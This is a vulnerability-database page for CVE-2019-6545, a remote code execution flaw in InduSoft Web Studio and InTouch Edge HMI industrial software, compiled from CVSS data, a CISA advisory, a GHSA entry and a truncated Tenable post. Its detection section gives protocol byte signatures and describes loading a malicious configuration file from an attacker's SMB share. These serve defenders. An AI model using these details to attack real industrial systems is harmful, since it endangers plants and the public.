CVE-2019-6545
published 2019-02-13CVE-2019-6545: AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An…
PriorityP263high7.5CVSS 3.1
AVNACLPRNUINSUCNIHAN
EXPLOIT
EPSS
13.86%
96.1th percentile
AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An unauthenticated remote user could use a specially crafted database connection configuration file to execute an arbitrary process on the server machine.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aveva | indusoft_web_studio | — | — |
| aveva | indusoft_web_studio | — | — |
| aveva | indusoft_web_studio | — | — |
| aveva | indusoft_web_studio | — | — |
| aveva | intouch_machine_edition_2014 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x02\x42 ... \x03
bytes↗
\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03
- →Detect unauthenticated DBProcessCall command 66 (0x42) messages on the InduSoft Web Studio agent port; the protocol frame starts with 0x02 0x42 and ends with 0x03. ↗
- →Alert on outbound SMB (TCP/445) connections originating from the InduSoft Web Studio process, which would indicate the agent is fetching a remote DB.xdc configuration file from an attacker-controlled SMB share. ↗
- →Monitor for the connection initialization handshake byte sequence 0x02 0x31 0x10 0x31 0x10 0x38 0x10 0x31 0x10 0x31 0x03 on the InduSoft agent port as a precursor to exploitation. ↗
- →Flag any UNC path arguments (e.g., \\<remote_ip>\<share>\DB) embedded in DBProcessCall messages, as the exploit passes a remote SMB path to load the malicious DB.xdc file. ↗
- ·The exploit uses an SMB share named 'LOLWAT' and serves a file named 'DB' (DB.xdc); the share name is attacker-controlled and will vary in real attacks — do not rely solely on the share name for detection. ↗
- ·CISA noted no known public exploits specifically targeted these vulnerabilities at advisory publication time (Feb 2019), but a public PoC was simultaneously released on Exploit-DB. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
AVEVA InduSoft Web Studio and InTouch Edge HMI
cisa_ics·2019-02-05·CVSS 9.8
[CRITICAL] AVEVA InduSoft Web Studio and InTouch Edge HMI
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
AVEVA InduSoft Web Studio and InTouch Edge HMI
Last RevisedFebruary 05, 2019
Alert CodeICSA-19-036-01
## 1. EXECUTIVE SUMMARY
-
CVSS v3 9.8
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: AVEVA Software, LLC (AVEVA)
- Equipment: InduSoft Web Studio and InTouch Edge HMI (formerly InTouch Machine Edition)
- Vulnerabilities: Missing Authentication for Critical Function, Resource Injection
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow a remote attacker to execute an arbitrary process using a specially crafted database
GHSA
GHSA-pqwc-c6p6-66pq: AVEVA Software, LLC InduSoft Web Studio prior to Version 8
ghsa_unreviewed·2022-05-13
CVE-2019-6545 [CRITICAL] CWE-99 GHSA-pqwc-c6p6-66pq: AVEVA Software, LLC InduSoft Web Studio prior to Version 8
AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An unauthenticated remote user could use a specially crafted database connection configuration file to execute an arbitrary process on the server machine.
No detection rules found.
Tenable
Remote Code Execution in InduSoft Web Studio
blogs_tenable·2019-02-06
Remote Code Execution in InduSoft Web Studio
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Remote Code Execution in InduSoft Web Studio
blogs_tenable·2019-02-06·CVSS 9.8
CVE-2019-6545 [CRITICAL] Remote Code Execution in InduSoft Web Studio
Blog / Research
Subscribe
# Remote Code Execution in InduSoft Web Studio
Tenable Research
February 6, 2019
2 Min Read
Enterprises running InduSoft Web Studio should update their software and ensure these critical systems are not exposed to the internet.
Tenable Research has discovered an unauthenticated remote code execution (RCE) vulnerability in InduSoft Web Studio 8.1.2.0. ICS-CERT has assigned CVE-2019-6545 and CVE-2019-6543 for this vulnerability.
### Background
InduSoft Web Studio is an automation tool for human-machine interface (HMI) and supervisory control and data acquisition (SCADA) systems. According to its website, Web Studio is used in manufacturing, oil and gas, municipal water and correctional facilities and even by a drag racer.
By exploiting this vulnerability, a
2019-02-13
Published